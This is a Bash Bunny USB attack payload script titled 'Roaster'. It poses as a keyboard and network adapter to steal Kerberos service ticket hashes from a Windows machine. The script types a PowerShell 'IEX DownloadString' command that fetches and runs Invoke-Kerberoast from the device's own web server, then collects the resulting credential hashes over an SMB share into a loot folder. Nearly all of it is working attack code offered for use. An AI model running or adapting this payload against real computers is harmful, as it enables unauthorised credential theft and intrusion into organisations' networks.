bashbunny-payloads/payloads/library/credentials/Roaster/payload.txt

#!/bin/bash
#
# Title:         Roaster
# Author:        golem445
# Version:       1.0
# Dependencies:  impacket, gohttp
# Runtime:		 ~10 seconds
#
# Sets up Ethernet and HID keyboard interfaces simultaneously,
# then uses HID to import Invoke-Kerberoast into memory via 
# Bash Bunny web server and execute the attack. Results are
# exported to the loot directory via SMB. 
#

### Prep for attack ###
LED SETUP
REQUIRETOOL impacket gohttp
GET SWITCH_POSITION

# Temporary loot directory
mkdir -p /loot/smb/

# Permanent loot directory
mkdir -p /root/udisk/loot/roaster_exfil/

# Set interfaces 
ATTACKMODE RNDIS_ETHERNET HID

# Start web server
cd /root/udisk/payloads/$SWITCH_POSITION
gohttp -p 80 &

# Start SMB Server
python /tools/impacket/examples/smbserver.py s /loot/smb &

### Start attack ###
LED ATTACK
RUN WIN powershell "IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"

# Wait until files are done copying.
LED STAGE2
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

### Cleanup ### 
LED CLEANUP

# Delete Exfil file
rm /loot/smb/EXFILTRATION_COMPLETE

# Move Kerberos SPNS to permanent loot directory
mv /loot/smb/* /root/udisk/loot/roaster_exfil/

# Clean up temporary loot directory
rm -rf /loot/smb/*

# Sync file system
sync

# Complete
LED FINISH